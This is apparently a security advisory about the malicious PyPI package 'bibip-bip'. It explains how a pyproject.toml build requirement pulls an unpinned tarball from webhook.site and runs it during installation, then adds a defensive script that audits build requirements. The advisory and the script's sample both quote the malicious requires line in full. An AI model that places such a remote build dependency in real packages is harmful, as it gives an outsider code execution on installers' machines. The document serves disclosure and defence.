Vulnerability
Malicious code in bibip-bip (PyPI)
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c2b153c90d83d4653660dd79a5a0935af85bd804fd98163c42995403bca240a6)

pyproject.toml declares a PEP 517 build requirement that points to an arbitrary tarball hosted on webhook.site, an anonymous request-inspection / file-hosting service: `requires = ["setuptools>=64", "aliga-raison @ https://webhook.site/d5367f1c-8bca-4d14-83d3-b2cbbce825eb/pypi/aliga-raison.tar.gz"]`. During `pip install` (or `pip wheel` / sdist build) pip resolves this direct-URL requirement into the build isolation environment and executes the tarball's setup.py, giving the URL owner arbitrary code execution on the installer's machine. The URL is unpinned (no hash), is not on the publisher's domain, and webhook.site content is fully attacker-controlled and mutable. The package's advertised purpose ('simple hello package') has no legitimate need for an external build dependency, let alone one fetched from an anonymous host.

## Source: kam193 (e9fe54b6f6746a12583461c774f3641de4be0a30042b0349c90b56a25413aa44)

Package tests exploitation via externally-hosted dependencies

---
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):
- The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
- The package overrides the install command in setup.py to execute malicious code during installation.
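As an added defensive check (not code from this record or from either source's tooling), the script below parses a pyproject.toml and flags `[build-system].requires` entries that are PEP 508 direct references fetched from a host outside an allowlist, over plaintext http, or without a `#sha256=` hash fragment. The `TRUSTED_HOSTS` allowlist is an assumption; the sample file is constructed, with its `requires` line mirroring the one quoted in this record.

```python
"""Audit [build-system].requires in a pyproject.toml for risky direct-URL build deps."""
import re
from urllib.parse import urlparse

# Hosts a build-time dependency may legitimately be downloaded from. This
# allowlist is an assumption for the example; adjust it to your own mirrors.
TRUSTED_HOSTS = {"pypi.org", "files.pythonhosted.org"}

# PEP 508 direct reference: "name[extras] @ <url>" (environment markers stripped first)
_DIRECT_REF = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*(?:\[[^\]]*\])?\s*@\s*(\S+)")


def audit_build_requires(requires):
    """Return (requirement, reason) findings for risky direct-URL build requirements."""
    findings = []
    for req in requires:
        match = _DIRECT_REF.match(req.split(";", 1)[0])
        if not match:
            continue  # ordinary name/version specifier, resolved from the package index
        _name, url = match.groups()
        parsed = urlparse(url)
        if parsed.scheme not in ("http", "https"):
            continue  # local file:// or VCS references are out of scope for this check
        if parsed.scheme == "http":
            findings.append((req, "plaintext http download"))
        if parsed.hostname not in TRUSTED_HOSTS:
            findings.append((req, f"fetched from untrusted host {parsed.hostname!r}"))
        if "sha256=" not in parsed.fragment:
            findings.append((req, "unpinned: no #sha256=... fragment on the URL"))
    return findings


def audit_pyproject(toml_text):
    """Parse pyproject.toml (Python 3.11+ tomllib) and audit its build requirements."""
    import tomllib
    data = tomllib.loads(toml_text)
    return audit_build_requires(data.get("build-system", {}).get("requires", []))


# Constructed sample; the requires line mirrors the one quoted in this record.
SAMPLE_PYPROJECT = """
[build-system]
requires = ["setuptools>=64", "aliga-raison @ https://webhook.site/d5367f1c-8bca-4d14-83d3-b2cbbce825eb/pypi/aliga-raison.tar.gz"]
build-backend = "setuptools.build_meta"
"""

if __name__ == "__main__":
    for req, reason in audit_pyproject(SAMPLE_PYPROJECT):
        print(f"RISK: {reason}\n      {req}")
```

Run it in CI against every pyproject.toml before `pip install` or `pip wheel` builds it, since build isolation fetches and executes these requirements before any of the package's own code is inspected.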
No CVSS base score from NVD or GHSA yet.
No exploitation, limited impact or prevalence